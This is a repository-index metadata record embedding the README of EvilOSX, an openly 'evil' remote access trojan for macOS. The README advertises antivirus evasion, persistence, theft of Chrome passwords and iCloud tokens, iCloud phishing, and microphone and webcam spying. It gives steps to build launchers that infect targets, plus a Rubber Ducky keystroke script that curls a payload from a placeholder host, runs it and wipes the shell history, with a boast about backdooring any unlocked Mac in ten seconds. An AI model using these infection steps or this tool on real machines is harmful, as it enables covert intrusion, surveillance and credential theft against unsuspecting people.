{"id":13454393,"url":"https://github.com/Marten4n6/EvilOSX","last_synced_at":"2025-03-24T05:33:42.386Z","repository":{"id":45522529,"uuid":"121546909","full_name":"Marten4n6/EvilOSX","owner":"Marten4n6","description":"An evil RAT (Remote Administration Tool) for macOS / OS X.","archived":false,"fork":false,"pushed_at":"2021-02-10T15:02:53.000Z","size":788,"stargazers_count":2314,"open_issues_count":45,"forks_count":486,"subscribers_count":109,"default_branch":"master","last_synced_at":"2025-03-17T11:02:54.925Z","etag":null,"topics":["backdoor","mac","macos","macosx","osx","pentesting","post-exploitation","python","python3","rat","reverse-shell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Marten4n6.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-02-14T18:38:55.000Z","updated_at":"2025-03-16T08:23:34.000Z","dependencies_parsed_at":"2022-07-16T01:47:55.936Z","dependency_job_id":null,"html_url":"https://github.com/Marten4n6/EvilOSX","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Marten4n6%2FEvilOSX","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Marten4n6%2FEvilOSX/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Marten4n6%2FEvilOSX/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Marten4n6%2FEvilOSX/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Marten4n6","download_url":"https://codeload.gi
thub.com/Marten4n6/EvilOSX/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245217427,"owners_count":20579291,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","mac","macos","macosx","osx","pentesting","post-exploitation","python","python3","rat","reverse-shell"],"created_at":"2024-07-31T08:00:53.684Z","updated_at":"2025-03-24T05:33:41.825Z","avatar_url":"https://github.com/Marten4n6.png","language":"Python","readme":"\u003ch1 align=\"center\"\u003e\n  \u003cbr\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX\"\u003e\u003cimg src=\"/data/images/logo.png?raw=true\" alt=\"Logo\" width=\"280\"\u003e\u003c/a\u003e\n  \u003cbr\u003e\n  EvilOSX\n  \u003cbr\u003e\n\u003c/h1\u003e\n\n\u003ch4 align=\"center\"\u003eAn evil RAT (Remote Administration Tool) for macOS / OS X.\u003c/h4\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt\"\u003e\n      \u003cimg src=\"https://img.shields.io/badge/license-GPLv3-blue.svg?style=flat-square\" alt=\"License\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt\"\u003e\n      \u003cimg src=\"https://img.shields.io/badge/python-2.7,%203.7-blue.svg?style=flat-square\" alt=\"Python\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX/issues\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/issues/Marten4n6/EvilOSX.svg?style=flat-square\" alt=\"Issues\"\u003e\n  \u003c/a\u003e\n  \u003ca 
href=\"https://travis-ci.org/Marten4n6/EvilOSX\"\u003e\n      \u003cimg src=\"https://img.shields.io/travis/Marten4n6/EvilOSX/master.svg?style=flat-square\" alt=\"Build Status\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md\"\u003e\n      \u003cimg src=\"https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat-square\" alt=\"Contributing\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n---\n\n[Macro Generator](https://github.com/cedowens/EvilOSX_MacroGenerator) by Cedric Owens\n\n### This project is no longer active\n\n## Features\n- Emulate a terminal instance\n- Simple extendable [module](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md) system\n- No bot dependencies (pure Python)\n- Undetected by anti-virus (OpenSSL [AES-256](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) encrypted payloads)\n- Persistent\n- GUI and CLI support\n- Retrieve Chrome passwords\n- Retrieve iCloud tokens and contacts\n- Retrieve/monitor the clipboard\n- Retrieve browser history (Chrome and Safari)\n- [Phish](https://i.imgur.com/x3ilHQi.png) for iCloud passwords via iTunes\n- iTunes (iOS) backup enumeration\n- Record the microphone\n- Take a desktop screenshot or picture using the webcam\n- Attempt to get root via local privilege escalation\n\n## How To Use\n\n```bash\n# Clone or download this repository\n$ git clone https://github.com/Marten4n6/EvilOSX\n\n# Go into the repository\n$ cd EvilOSX\n\n# Install dependencies required by the server\n$ sudo pip install -r requirements.txt\n\n# Start the GUI\n$ python start.py\n\n# Lastly, run a built launcher on your target(s)\n```\n\n**Warning:** Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.\n\n### Advanced users\n\nThere's also a CLI for those who want to use this over SSH:\n```bash\n# Create a launcher to infect your 
target(s)\n$ python start.py --builder\n\n# Start the CLI\n$ python start.py --cli --port 1337\n\n# Lastly, run a built launcher on your target(s)\n```\n\n## Screenshots\n\n![CLI](https://i.imgur.com/DGYCQMl.png)\n![GUI](https://i.imgur.com/qw3k4z4.png)\n\n## Motivation\nThis project was created to be used with my [Rubber Ducky](https://hakshop.com/products/usb-rubber-ducky-deluxe), here's the simple script:\n```\nREM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX\nREM See also: https://ducktoolkit.com/vidpid/\n\nDELAY 1000\nGUI SPACE\nDELAY 500\nSTRING Termina\nDELAY 1000\nENTER\nDELAY 1500\n\nREM Kill all terminals after x seconds\nSTRING screen -dm bash -c 'sleep 6; killall Terminal'\nENTER\n\nSTRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear\nENTER\n```\n- It takes about 10 seconds to backdoor any unlocked Mac, which is...... *nice*\n- Termina**l** is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. \u003cbr/\u003e\n- To bypass the keyboard setup assistant make sure you change the VID\u0026PID which can be found [here](https://ducktoolkit.com/vidpid/). \u003cbr/\u003e\n  Aluminum Keyboard (ISO) is probably the one you are looking for.\n\n\n## Versioning\nEvilOSX will be maintained under the Semantic Versioning guidelines as much as possible. 
\u003cbr/\u003e\nServer and bot releases will be numbered with the following format:\n```\n\u003cmajor\u003e.\u003cminor\u003e.\u003cpatch\u003e\n```\n\nAnd constructed with the following guidelines:\n- Breaking backward compatibility (with older bots) bumps the major\n- New additions without breaking backward compatibility bump the minor\n- Bug fixes and misc changes bump the patch\n\nFor more information on SemVer, please visit https://semver.org/.\n\n## Design Notes\n- Infecting a machine is split up into three parts:\n  * A **launcher** is run on the target machine whose only goal is to run the stager\n  * The stager asks the server for a **loader** which handles how a payload will be loaded\n  * The loader is given a uniquely encrypted **payload** and then sent back to the stager\n- The server hides its communications by sending messages hidden in HTTP 404 error pages (from BlackHat's \"Hiding In Plain Sight\")\n  * Command requests are retrieved from the server via a GET request\n  * Command responses are sent to the server via a POST request\n- Modules take advantage of Python's dynamic nature: they are simply sent over the network compressed with [zlib](https://www.zlib.net), along with any configuration options\n- Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline\n\n## Issues\nFeel free to submit any issues or feature requests [here](https://github.com/Marten4n6/EvilOSX/issues).\n\n## Contributing\nFor a simple guide on how to create modules click [here](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md).\n\n## Credits\n- The awesome [Empire](https://github.com/EmpireProject) project\n- Shoutout to [Patrick Wardle](https://twitter.com/patrickwardle) for his awesome talks, check out [Objective-See](https://objective-see.com/)\n- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts \u003cbr/\u003e\n  (now deleted... 
let me know if you reappear)\n- The slowloris module is pretty much copied from [PySlowLoris](https://github.com/ProjectMayhem/PySlowLoris)\n- [urwid](http://urwid.org/) and [this code](https://github.com/izderadicka/xmpp-tester/blob/master/commander.py) which saved me a lot of time with the CLI\n- Logo created by [motusora](https://www.behance.net/motusora)\n\n## License\n[GPLv3](https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt)\n","funding_links":[],"categories":["macOS Utilities","Uncategorized","Python","Python (1887)","backdoor","Tools","Operating Systems"],"sub_categories":["Intentionally Vulnerable Systems as Docker Containers","Uncategorized","macOS Utilities","macOS","Penetration Testing Report Templates","Open Source"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMarten4n6%2FEvilOSX","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMarten4n6%2FEvilOSX","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMarten4n6%2FEvilOSX/lists"}